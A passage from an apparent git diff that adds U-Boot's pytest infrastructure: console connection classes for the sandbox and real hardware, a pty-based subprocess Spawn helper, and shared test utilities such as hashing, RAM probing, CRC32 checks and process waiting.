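    assert 'foo=bar' in output[1]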
+ """ + + if type(text) == type(''): + text = re.escape(text) + m = self.p.expect([text] + self.bad_patterns) + if m != 0: + raise Exception('Bad pattern found on console: ' + + self.bad_pattern_ids[m - 1]) + + def drain_console(self): + """Read from and log the U-Boot console for a short time. + + U-Boot's console output is only logged when the test code actively + waits for U-Boot to emit specific data. There are cases where tests + can fail without doing this. For example, if a test asks U-Boot to + enable USB device mode, then polls until a host-side device node + exists. In such a case, it is useful to log U-Boot's console output + in case U-Boot printed clues as to why the host-side even did not + occur. This function will do that. + + Args: + None. + + Returns: + Nothing. + """ + + # If we are already not connected to U-Boot, there's nothing to drain. + # This should only happen when a previous call to run_command() or + # wait_for() failed (and hence the output has already been logged), or + # the system is shutting down. + if not self.p: + return + + orig_timeout = self.p.timeout + try: + # Drain the log for a relatively short time. + self.p.timeout = 1000 + # Wait for something U-Boot will likely never send. This will + # cause the console output to be read and logged. + self.p.expect(['This should never match U-Boot output']) + except: + # We expect a timeout, since U-Boot won't print what we waited + # for. Squash it when it happens. + # + # Squash any other exception too. This function is only used to + # drain (and log) the U-Boot console output after a failed test. + # The U-Boot process will be restarted, or target board reset, once + # this function returns. So, we don't care about detecting any + # additional errors, so they're squashed so that the rest of the + # post-test-failure cleanup code can continue operation, and + # correctly terminate any log sections, etc. + pass + finally: + self.p.timeout = orig_timeout + + def ensure_spawned(self, expect_reset=False): + """Ensure a connection to a correctly running U-Boot instance. + + This may require spawning a new Sandbox process or resetting target + hardware, as defined by the implementation sub-class. + + This is an internal function and should not be called directly. + + Args: + expect_reset: Boolean indication whether this boot is expected + to be reset while the 1st boot process after main boot before + prompt. False by default. + + Returns: + Nothing. + """ + + if self.p: + # Reset the console timeout value as some tests may change + # its default value during the execution + if not self.config.gdbserver: + self.p.timeout = 30000 + return + try: + self.log.start_section('Starting U-Boot') + self.at_prompt = False + self.p = self.get_spawn() + # Real targets can take a long time to scroll large amounts of + # text if LCD is enabled. This value may need tweaking in the + # future, possibly per-test to be optimal. This works for 'help' + # on board 'seaboard'. + if not self.config.gdbserver: + self.p.timeout = 30000 + self.p.logfile_read = self.logstream + if expect_reset: + loop_num = 2 + else: + loop_num = 1 + self.wait_for_boot_prompt(loop_num = loop_num) + self.at_prompt = True + self.at_prompt_logevt = self.logstream.logfile.cur_evt + except Exception as ex: + self.log.error(str(ex)) + self.cleanup_spawn() + raise + finally: + self.log.timestamp() + self.log.end_section('Starting U-Boot') + + def cleanup_spawn(self): + """Shut down all interaction with the U-Boot instance. 
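The host-side polling scenario described in drain_console() above might look roughly like this in a test; the device path is a hypothetical example and wait_until_open_succeeds() comes from u_boot_utils.py below:

    import u_boot_utils    # normally imported at module level

    u_boot_console.run_command('ums 0 mmc 0', wait_for_prompt=False)
    try:
        fh = u_boot_utils.wait_until_open_succeeds('/dev/example-usb-disk')
        fh.close()
    except Exception:
        # Log whatever U-Boot printed; it may explain why the node never appeared.
        u_boot_console.drain_console()
        raise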
+ + This is used when an error is detected prior to re-establishing a + connection with a fresh U-Boot instance. + + This is an internal function and should not be called directly. + + Args: + None. + + Returns: + Nothing. + """ + + try: + if self.p: + self.p.close() + except: + pass + self.p = None + + def restart_uboot(self, expect_reset=False): + """Shut down and restart U-Boot.""" + self.cleanup_spawn() + self.ensure_spawned(expect_reset) + + def get_spawn_output(self): + """Return the start-up output from U-Boot + + Returns: + The output produced by ensure_spawed(), as a string. + """ + if self.p: + return self.p.get_expect_output() + return None + + def validate_version_string_in_text(self, text): + """Assert that a command's output includes the U-Boot signon message. + + This is primarily useful for validating the "version" command without + duplicating the signon text regex in a test function. + + Args: + text: The command output text to check. + + Returns: + Nothing. An exception is raised if the validation fails. + """ + + assert(self.u_boot_version_string in text) + + def disable_check(self, check_type): + """Temporarily disable an error check of U-Boot's output. + + Create a new context manager (for use with the "with" statement) which + temporarily disables a particular console output error check. + + Args: + check_type: The type of error-check to disable. Valid values may + be found in self.disable_check_count above. + + Returns: + A context manager object. + """ + + return ConsoleDisableCheck(self, check_type) + + def temporary_timeout(self, timeout): + """Temporarily set up different timeout for commands. + + Create a new context manager (for use with the "with" statement) which + temporarily change timeout. + + Args: + timeout: Time in milliseconds. + + Returns: + A context manager object. + """ + + return ConsoleSetupTimeout(self, timeout) diff --git a/test/py/u_boot_console_exec_attach.py b/test/py/u_boot_console_exec_attach.py new file mode 100644 index 00000000000..8dd8cc1230c --- /dev/null +++ b/test/py/u_boot_console_exec_attach.py @@ -0,0 +1,72 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2015 Stephen Warren +# Copyright (c) 2015-2016, NVIDIA CORPORATION. All rights reserved. + +""" +Logic to interact with U-Boot running on real hardware, typically via a +physical serial port. +""" + +import sys +from u_boot_spawn import Spawn +from u_boot_console_base import ConsoleBase + +class ConsoleExecAttach(ConsoleBase): + """Represents a physical connection to a U-Boot console, typically via a + serial port. This implementation executes a sub-process to attach to the + console, expecting that the stdin/out of the sub-process will be forwarded + to/from the physical hardware. This approach isolates the test infra- + structure from the user-/installation-specific details of how to + communicate with, and the identity of, serial ports etc.""" + + def __init__(self, log, config): + """Initialize a U-Boot console connection. + + Args: + log: A multiplexed_log.Logfile instance. + config: A "configuration" object as defined in conftest.py. + + Returns: + Nothing. + """ + + # The max_fifo_fill value might need tweaking per-board/-SoC? + # 1 would be safe anywhere, but is very slow (a pexpect issue?). + # 16 is a common FIFO size. + # HW flow control would mean this could be infinite. 
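The temporary_timeout() helper defined above takes a value in milliseconds; a minimal sketch for a command that legitimately needs longer than the 30 second default (assuming the U-Boot 'sleep' command is enabled):

    with u_boot_console.temporary_timeout(120000):
        # 120 s window for a command that runs well past the default timeout.
        u_boot_console.run_command('sleep 100')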
+ super(ConsoleExecAttach, self).__init__(log, config, max_fifo_fill=16) + + with self.log.section('flash'): + self.log.action('Flashing U-Boot') + cmd = ['u-boot-test-flash', config.board_type, config.board_identity] + runner = self.log.get_runner(cmd[0], sys.stdout) + runner.run(cmd) + runner.close() + self.log.status_pass('OK') + + def get_spawn(self): + """Connect to a fresh U-Boot instance. + + The target board is reset, so that U-Boot begins running from scratch. + + Args: + None. + + Returns: + A u_boot_spawn.Spawn object that is attached to U-Boot. + """ + + args = [self.config.board_type, self.config.board_identity] + s = Spawn(['u-boot-test-console'] + args) + + try: + self.log.action('Resetting board') + cmd = ['u-boot-test-reset'] + args + runner = self.log.get_runner(cmd[0], sys.stdout) + runner.run(cmd) + runner.close() + except: + s.close() + raise + + return s diff --git a/test/py/u_boot_console_sandbox.py b/test/py/u_boot_console_sandbox.py new file mode 100644 index 00000000000..27c6db8d719 --- /dev/null +++ b/test/py/u_boot_console_sandbox.py @@ -0,0 +1,119 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2015 Stephen Warren +# Copyright (c) 2015-2016, NVIDIA CORPORATION. All rights reserved. + +""" +Logic to interact with the sandbox port of U-Boot, running as a sub-process. +""" + +import time +from u_boot_spawn import Spawn +from u_boot_console_base import ConsoleBase + +class ConsoleSandbox(ConsoleBase): + """Represents a connection to a sandbox U-Boot console, executed as a sub- + process.""" + + def __init__(self, log, config): + """Initialize a U-Boot console connection. + + Args: + log: A multiplexed_log.Logfile instance. + config: A "configuration" object as defined in conftest.py. + + Returns: + Nothing. + """ + + super(ConsoleSandbox, self).__init__(log, config, max_fifo_fill=1024) + self.sandbox_flags = [] + self.use_dtb = True + + def get_spawn(self): + """Connect to a fresh U-Boot instance. + + A new sandbox process is created, so that U-Boot begins running from + scratch. + + Args: + None. + + Returns: + A u_boot_spawn.Spawn object that is attached to U-Boot. + """ + + bcfg = self.config.buildconfig + config_spl = bcfg.get('config_spl', 'n') == 'y' + config_vpl = bcfg.get('config_vpl', 'n') == 'y' + if config_vpl: + # Run TPL first, which runs VPL + fname = '/tpl/u-boot-tpl' + else: + fname = '/spl/u-boot-spl' if config_spl else '/u-boot' + print(fname) + cmd = [] + if self.config.gdbserver: + cmd += ['gdbserver', self.config.gdbserver] + cmd += [self.config.build_dir + fname, '-v'] + if self.use_dtb: + cmd += ['-d', self.config.dtb] + cmd += self.sandbox_flags + return Spawn(cmd, cwd=self.config.source_dir) + + def restart_uboot_with_flags(self, flags, expect_reset=False, use_dtb=True): + """Run U-Boot with the given command-line flags + + Args: + flags: List of flags to pass, each a string + expect_reset: Boolean indication whether this boot is expected + to be reset while the 1st boot process after main boot before + prompt. False by default. + use_dtb: True to use a device tree file, False to run without one + + Returns: + A u_boot_spawn.Spawn object that is attached to U-Boot. + """ + + try: + self.sandbox_flags = flags + self.use_dtb = use_dtb + return self.restart_uboot(expect_reset) + finally: + self.sandbox_flags = [] + self.use_dtb = True + + def kill(self, sig): + """Send a specific Unix signal to the sandbox process. + + Args: + sig: The Unix signal to send to the process. + + Returns: + Nothing. 
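kill() pairs naturally with validate_exited() just below; a sketch in the spirit of the sandbox process-control tests:

    import signal    # normally imported at module level

    u_boot_console.kill(signal.SIGINT)
    assert u_boot_console.validate_exited()
    # The next test gets a fresh process via ensure_spawned().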
+ """ + + self.log.action('kill %d' % sig) + self.p.kill(sig) + + def validate_exited(self): + """Determine whether the sandbox process has exited. + + If required, this function waits a reasonable time for the process to + exit. + + Args: + None. + + Returns: + Boolean indicating whether the process has exited. + """ + + p = self.p + self.p = None + for i in range(100): + ret = not p.isalive() + if ret: + break + time.sleep(0.1) + p.close() + return ret diff --git a/test/py/u_boot_spawn.py b/test/py/u_boot_spawn.py new file mode 100644 index 00000000000..7c48d96210e --- /dev/null +++ b/test/py/u_boot_spawn.py @@ -0,0 +1,241 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2015-2016, NVIDIA CORPORATION. All rights reserved. + +""" +Logic to spawn a sub-process and interact with its stdio. +""" + +import os +import re +import pty +import signal +import select +import time +import traceback + +class Timeout(Exception): + """An exception sub-class that indicates that a timeout occurred.""" + +class Spawn: + """Represents the stdio of a freshly created sub-process. Commands may be + sent to the process, and responses waited for. + + Members: + output: accumulated output from expect() + """ + + def __init__(self, args, cwd=None): + """Spawn (fork/exec) the sub-process. + + Args: + args: array of processs arguments. argv[0] is the command to + execute. + cwd: the directory to run the process in, or None for no change. + + Returns: + Nothing. + """ + + self.waited = False + self.exit_code = 0 + self.exit_info = '' + self.buf = '' + self.output = '' + self.logfile_read = None + self.before = '' + self.after = '' + self.timeout = None + # http://stackoverflow.com/questions/7857352/python-regex-to-match-vt100-escape-sequences + self.re_vt100 = re.compile(r'(\x1b\[|\x9b)[^@-_]*[@-_]|\x1b[@-_]', re.I) + + (self.pid, self.fd) = pty.fork() + if self.pid == 0: + try: + # For some reason, SIGHUP is set to SIG_IGN at this point when + # run under "go" (www.go.cd). Perhaps this happens under any + # background (non-interactive) system? + signal.signal(signal.SIGHUP, signal.SIG_DFL) + if cwd: + os.chdir(cwd) + os.execvp(args[0], args) + except: + print('CHILD EXECEPTION:') + traceback.print_exc() + finally: + os._exit(255) + + try: + self.poll = select.poll() + self.poll.register(self.fd, select.POLLIN | select.POLLPRI | select.POLLERR | + select.POLLHUP | select.POLLNVAL) + except: + self.close() + raise + + def kill(self, sig): + """Send unix signal "sig" to the child process. + + Args: + sig: The signal number to send. + + Returns: + Nothing. + """ + + os.kill(self.pid, sig) + + def checkalive(self): + """Determine whether the child process is still running. + + Returns: + tuple: + True if process is alive, else False + 0 if process is alive, else exit code of process + string describing what happened ('' or 'status/signal n') + """ + + if self.waited: + return False, self.exit_code, self.exit_info + + w = os.waitpid(self.pid, os.WNOHANG) + if w[0] == 0: + return True, 0, 'running' + status = w[1] + + if os.WIFEXITED(status): + self.exit_code = os.WEXITSTATUS(status) + self.exit_info = 'status %d' % self.exit_code + elif os.WIFSIGNALED(status): + signum = os.WTERMSIG(status) + self.exit_code = -signum + self.exit_info = 'signal %d (%s)' % (signum, signal.Signals(signum).name) + self.waited = True + return False, self.exit_code, self.exit_info + + def isalive(self): + """Determine whether the child process is still running. + + Args: + None. 
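The Spawn class can be exercised on any interactive program, not just U-Boot; a self-contained sketch using cat:

    from u_boot_spawn import Spawn

    s = Spawn(['cat'])      # echoes stdin back through a pty
    s.timeout = 1000        # expect() timeout, in milliseconds
    s.send('hello\n')
    assert s.expect(['hello']) == 0
    s.close()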
+ + Returns: + Boolean indicating whether process is alive. + """ + return self.checkalive()[0] + + def send(self, data): + """Send data to the sub-process's stdin. + + Args: + data: The data to send to the process. + + Returns: + Nothing. + """ + + os.write(self.fd, data.encode(errors='replace')) + + def expect(self, patterns): + """Wait for the sub-process to emit specific data. + + This function waits for the process to emit one pattern from the + supplied list of patterns, or for a timeout to occur. + + Args: + patterns: A list of strings or regex objects that we expect to + see in the sub-process' stdout. + + Returns: + The index within the patterns array of the pattern the process + emitted. + + Notable exceptions: + Timeout, if the process did not emit any of the patterns within + the expected time. + """ + + for pi in range(len(patterns)): + if type(patterns[pi]) == type(''): + patterns[pi] = re.compile(patterns[pi]) + + tstart_s = time.time() + try: + while True: + earliest_m = None + earliest_pi = None + for pi in range(len(patterns)): + pattern = patterns[pi] + m = pattern.search(self.buf) + if not m: + continue + if earliest_m and m.start() >= earliest_m.start(): + continue + earliest_m = m + earliest_pi = pi + if earliest_m: + pos = earliest_m.start() + posafter = earliest_m.end() + self.before = self.buf[:pos] + self.after = self.buf[pos:posafter] + self.output += self.buf[:posafter] + self.buf = self.buf[posafter:] + return earliest_pi + tnow_s = time.time() + if self.timeout: + tdelta_ms = (tnow_s - tstart_s) * 1000 + poll_maxwait = self.timeout - tdelta_ms + if tdelta_ms > self.timeout: + raise Timeout() + else: + poll_maxwait = None + events = self.poll.poll(poll_maxwait) + if not events: + raise Timeout() + try: + c = os.read(self.fd, 1024).decode(errors='replace') + except OSError as err: + # With sandbox, try to detect when U-Boot exits when it + # shouldn't and explain why. This is much more friendly than + # just dying with an I/O error + if err.errno == 5: # Input/output error + alive, _, info = self.checkalive() + if alive: + raise err + raise ValueError('U-Boot exited with %s' % info) + raise err + if self.logfile_read: + self.logfile_read.write(c) + self.buf += c + # count=0 is supposed to be the default, which indicates + # unlimited substitutions, but in practice the version of + # Python in Ubuntu 14.04 appears to default to count=2! + self.buf = self.re_vt100.sub('', self.buf, count=1000000) + finally: + if self.logfile_read: + self.logfile_read.flush() + + def close(self): + """Close the stdio connection to the sub-process. + + This also waits a reasonable time for the sub-process to stop running. + + Args: + None. + + Returns: + Nothing. + """ + + os.close(self.fd) + for _ in range(100): + if not self.isalive(): + break + time.sleep(0.1) + + def get_expect_output(self): + """Return the output read by expect() + + Returns: + The output processed by expect(), as a string. + """ + return self.output diff --git a/test/py/u_boot_utils.py b/test/py/u_boot_utils.py new file mode 100644 index 00000000000..9e161fbc238 --- /dev/null +++ b/test/py/u_boot_utils.py @@ -0,0 +1,382 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2016, NVIDIA CORPORATION. All rights reserved. + +""" +Utility code shared across multiple tests. +""" + +import hashlib +import inspect +import os +import os.path +import pathlib +import signal +import sys +import time +import re +import pytest + +def md5sum_data(data): + """Calculate the MD5 hash of some data. 
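One subtlety of expect() in u_boot_spawn.py worth spelling out: the return value is the index of the pattern that matches earliest in the output stream, not of the first list entry that happens to match. A standalone sketch:

    from u_boot_spawn import Spawn

    s = Spawn(['sh', '-c', 'echo foo; echo bar'])
    s.timeout = 1000
    # 'foo' appears first in the stream, so its index (1) is returned even
    # though 'bar' is listed first.
    assert s.expect(['bar', 'foo']) == 1
    s.close()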
+ + Args: + data: The data to hash. + + Returns: + The hash of the data, as a binary string. + """ + + h = hashlib.md5() + h.update(data) + return h.digest() + +def md5sum_file(fn, max_length=None): + """Calculate the MD5 hash of the contents of a file. + + Args: + fn: The filename of the file to hash. + max_length: The number of bytes to hash. If the file has more + bytes than this, they will be ignored. If None or omitted, the + entire file will be hashed. + + Returns: + The hash of the file content, as a binary string. + """ + + with open(fn, 'rb') as fh: + if max_length: + params = [max_length] + else: + params = [] + data = fh.read(*params) + return md5sum_data(data) + +class PersistentRandomFile: + """Generate and store information about a persistent file containing + random data.""" + + def __init__(self, u_boot_console, fn, size): + """Create or process the persistent file. + + If the file does not exist, it is generated. + + If the file does exist, its content is hashed for later comparison. + + These files are always located in the "persistent data directory" of + the current test run. + + Args: + u_boot_console: A console connection to U-Boot. + fn: The filename (without path) to create. + size: The desired size of the file in bytes. + + Returns: + Nothing. + """ + + self.fn = fn + + self.abs_fn = u_boot_console.config.persistent_data_dir + '/' + fn + + if os.path.exists(self.abs_fn): + u_boot_console.log.action('Persistent data file ' + self.abs_fn + + ' already exists') + self.content_hash = md5sum_file(self.abs_fn) + else: + u_boot_console.log.action('Generating ' + self.abs_fn + + ' (random, persistent, %d bytes)' % size) + data = os.urandom(size) + with open(self.abs_fn, 'wb') as fh: + fh.write(data) + self.content_hash = md5sum_data(data) + +def attempt_to_open_file(fn): + """Attempt to open a file, without throwing exceptions. + + Any errors (exceptions) that occur during the attempt to open the file + are ignored. This is useful in order to test whether a file (in + particular, a device node) exists and can be successfully opened, in order + to poll for e.g. USB enumeration completion. + + Args: + fn: The filename to attempt to open. + + Returns: + An open file handle to the file, or None if the file could not be + opened. + """ + + try: + return open(fn, 'rb') + except: + return None + +def wait_until_open_succeeds(fn): + """Poll until a file can be opened, or a timeout occurs. + + Continually attempt to open a file, and return when this succeeds, or + raise an exception after a timeout. + + Args: + fn: The filename to attempt to open. + + Returns: + An open file handle to the file. + """ + + for i in range(100): + fh = attempt_to_open_file(fn) + if fh: + return fh + time.sleep(0.1) + raise Exception('File could not be opened') + +def wait_until_file_open_fails(fn, ignore_errors): + """Poll until a file cannot be opened, or a timeout occurs. + + Continually attempt to open a file, and return when this fails, or + raise an exception after a timeout. + + Args: + fn: The filename to attempt to open. + ignore_errors: Indicate whether to ignore timeout errors. If True, the + function will simply return if a timeout occurs, otherwise an + exception will be raised. + + Returns: + Nothing. 
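A sketch of how a storage test might use PersistentRandomFile above (file name and size are illustrative):

    import u_boot_utils    # normally imported at module level

    test_file = u_boot_utils.PersistentRandomFile(u_boot_console,
                                                  'ums.bin', 1024 * 1024)
    # test_file.abs_fn is the host-side path and test_file.content_hash the
    # MD5 digest, for later comparison against data read back from the target.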
+ """ + + for _ in range(100): + fh = attempt_to_open_file(fn) + if not fh: + return + fh.close() + time.sleep(0.1) + if ignore_errors: + return + raise Exception('File can still be opened') + +def run_and_log(u_boot_console, cmd, ignore_errors=False, stdin=None, env=None): + """Run a command and log its output. + + Args: + u_boot_console: A console connection to U-Boot. + cmd: The command to run, as an array of argv[], or a string. + If a string, note that it is split up so that quoted spaces + will not be preserved. E.g. "fred and" becomes ['"fred', 'and"'] + ignore_errors: Indicate whether to ignore errors. If True, the function + will simply return if the command cannot be executed or exits with + an error code, otherwise an exception will be raised if such + problems occur. + stdin: Input string to pass to the command as stdin (or None) + env: Environment to use, or None to use the current one + + Returns: + The output as a string. + """ + if isinstance(cmd, str): + cmd = cmd.split() + runner = u_boot_console.log.get_runner(cmd[0], sys.stdout) + output = runner.run(cmd, ignore_errors=ignore_errors, stdin=stdin, env=env) + runner.close() + return output + +def run_and_log_expect_exception(u_boot_console, cmd, retcode, msg): + """Run a command that is expected to fail. + + This runs a command and checks that it fails with the expected return code + and exception method. If not, an exception is raised. + + Args: + u_boot_console: A console connection to U-Boot. + cmd: The command to run, as an array of argv[]. + retcode: Expected non-zero return code from the command. + msg: String that should be contained within the command's output. + """ + try: + runner = u_boot_console.log.get_runner(cmd[0], sys.stdout) + runner.run(cmd) + except Exception: + assert retcode == runner.exit_status + assert msg in runner.output + else: + raise Exception("Expected an exception with retcode %d message '%s'," + "but it was not raised" % (retcode, msg)) + finally: + runner.close() + +ram_base = None +def find_ram_base(u_boot_console): + """Find the running U-Boot's RAM location. + + Probe the running U-Boot to determine the address of the first bank + of RAM. This is useful for tests that test reading/writing RAM, or + load/save files that aren't associated with some standard address + typically represented in an environment variable such as + ${kernel_addr_r}. The value is cached so that it only needs to be + actively read once. + + Args: + u_boot_console: A console connection to U-Boot. + + Returns: + The address of U-Boot's first RAM bank, as an integer. + """ + + global ram_base + if u_boot_console.config.buildconfig.get('config_cmd_bdi', 'n') != 'y': + pytest.skip('bdinfo command not supported') + if ram_base == -1: + pytest.skip('Previously failed to find RAM bank start') + if ram_base is not None: + return ram_base + + with u_boot_console.log.section('find_ram_base'): + response = u_boot_console.run_command('bdinfo') + for l in response.split('\n'): + if '-> start' in l or 'memstart =' in l: + ram_base = int(l.split('=')[1].strip(), 16) + break + if ram_base is None: + ram_base = -1 + raise Exception('Failed to find RAM bank start in `bdinfo`') + + # We don't want ram_base to be zero as some functions test if the given + # address is NULL (0). Besides, on some RISC-V targets the low memory + # is protected that prevents S-mode U-Boot from access. + # Let's add 2MiB then (size of an ARM LPAE/v8 section). 
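Typical use of find_ram_base() in a memory-command test (the md invocation is illustrative and assumes the memory commands are enabled):

    import u_boot_utils    # normally imported at module level

    ram_base = u_boot_utils.find_ram_base(u_boot_console)
    response = u_boot_console.run_command('md.b %08x 10' % ram_base)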
+ + ram_base += 1024 * 1024 * 2 + + return ram_base + +class PersistentFileHelperCtxMgr(object): + """A context manager for Python's "with" statement, which ensures that any + generated file is deleted (and hence regenerated) if its mtime is older + than the mtime of the Python module which generated it, and gets an mtime + newer than the mtime of the Python module which generated after it is + generated. Objects of this type should be created by factory function + persistent_file_helper rather than directly.""" + + def __init__(self, log, filename): + """Initialize a new object. + + Args: + log: The Logfile object to log to. + filename: The filename of the generated file. + + Returns: + Nothing. + """ + + self.log = log + self.filename = filename + + def __enter__(self): + frame = inspect.stack()[1] + module = inspect.getmodule(frame[0]) + self.module_filename = module.__file__ + self.module_timestamp = os.path.getmtime(self.module_filename) + + if os.path.exists(self.filename): + filename_timestamp = os.path.getmtime(self.filename) + if filename_timestamp < self.module_timestamp: + self.log.action('Removing stale generated file ' + + self.filename) + pathlib.Path(self.filename).unlink() + + def __exit__(self, extype, value, traceback): + if extype: + try: + pathlib.Path(self.filename).unlink() + except Exception: + pass + return + logged = False + for _ in range(20): + filename_timestamp = os.path.getmtime(self.filename) + if filename_timestamp > self.module_timestamp: + break + if not logged: + self.log.action( + 'Waiting for generated file timestamp to increase') + logged = True + os.utime(self.filename) + time.sleep(0.1) + +def persistent_file_helper(u_boot_log, filename): + """Manage the timestamps and regeneration of a persistent generated + file. This function creates a context manager for Python's "with" + statement + + Usage: + with persistent_file_helper(u_boot_console.log, filename): + code to generate the file, if it's missing. + + Args: + u_boot_log: u_boot_console.log. + filename: The filename of the generated file. + + Returns: + A context manager object. + """ + + return PersistentFileHelperCtxMgr(u_boot_log, filename) + +def crc32(u_boot_console, address, count): + """Helper function used to compute the CRC32 value of a section of RAM. + + Args: + u_boot_console: A U-Boot console connection. + address: Address where data starts. + count: Amount of data to use for calculation. + + Returns: + CRC32 value + """ + + bcfg = u_boot_console.config.buildconfig + has_cmd_crc32 = bcfg.get('config_cmd_crc32', 'n') == 'y' + assert has_cmd_crc32, 'Cannot compute crc32 without CONFIG_CMD_CRC32.' + output = u_boot_console.run_command('crc32 %08x %x' % (address, count)) + + m = re.search('==> ([0-9a-fA-F]{8})$', output) + assert m, 'CRC32 operation failed.' + + return m.group(1) + +def waitpid(pid, timeout=60, kill=False): + """Wait a process to terminate by its PID + + This is an alternative to a os.waitpid(pid, 0) call that works on + processes that aren't children of the python process. + + Args: + pid: PID of a running process. + timeout: Time in seconds to wait. + kill: Whether to forcibly kill the process after timeout. + + Returns: + True, if the process ended on its own. + False, if the process was killed by this function. + + Raises: + TimeoutError, if the process is still running after timeout. 
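Expanding the Usage note in the persistent_file_helper() docstring above into a concrete sketch (the file name and size are hypothetical):

    import os
    import u_boot_utils    # normally imported at module level

    fn = u_boot_console.config.persistent_data_dir + '/example.img'
    with u_boot_utils.persistent_file_helper(u_boot_console.log, fn):
        if not os.path.exists(fn):
            with open(fn, 'wb') as fh:
                fh.write(os.urandom(4096))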
+ """ + try: + for _ in range(timeout): + os.kill(pid, 0) + time.sleep(1) + + if kill: + os.kill(pid, signal.SIGKILL) + return False + + except ProcessLookupError: + return True + + raise TimeoutError( + "Process with PID {} did not terminate after {} seconds." + .format(pid, timeout) + )
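Finally, a short usage sketch for waitpid(); the PID is assumed to come from a process the test started by other means:

    import u_boot_utils    # normally imported at module level

    # Wait up to 30 s for the process to finish; force-kill it on overrun,
    # in which case waitpid() returns False instead of raising TimeoutError.
    ended_normally = u_boot_utils.waitpid(pid, timeout=30, kill=True)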